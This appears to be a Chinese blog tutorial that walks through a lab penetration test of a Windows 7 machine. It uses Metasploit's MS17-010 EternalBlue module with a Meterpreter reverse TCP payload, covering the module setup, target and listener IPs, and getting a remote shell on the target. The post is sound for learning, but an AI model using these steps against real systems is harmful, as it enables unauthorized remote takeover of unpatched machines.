MSF渗透测试

环境:
靶机:win7(x64)
攻击机:linux2020.2
(在内网中测试)

步骤:
一、在kali终端输入:msfconsole(启动有点久)

二、直接输入指令搜索:search ms17_010
(之前的永恒之蓝)

下一步用下面第二个模块
在这里插入图片描述
三、通过use来使用该模块,所以输入指令 :
use exploit/windows/smb/ms17_010_eternalblue
得到如下,可以看到RHOSTS(目标主机ip)和LHOST (本地ip)两个参数需要配置,其他的默认,目标端口已经默认为445。
在这里插入图片描述
三、现在开始配置RHOSTS、LHOST、payload
输入以下指令配置:
1、set RHOSTS 192.168.0.15
2、set LHOST 192.168.0.14
3、set payload windows/x64/meterpreter/reverse_tcp(这里用的是反向连接,比较常用)

四、配置成功后输入show options查看配置
可以看到下图已经配置成功
在这里插入图片描述
五、接下来就可以run了
输入run回车等待一会
在这里插入图片描述
六、看到下图已经拿到权限。
在这里插入图片描述
最后输入shell登录到目标机,就可以对目标机进行各种操控,例如查看文件,创建文件夹等等。

例如:
输入指令cd C:\进入C盘目录下
输入指令md muma创建名为muma的文件夹
输入指令dir查看C盘文件,下图可以看到已经在目标机C盘里创建了muma文件夹在这里插入图片描述

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值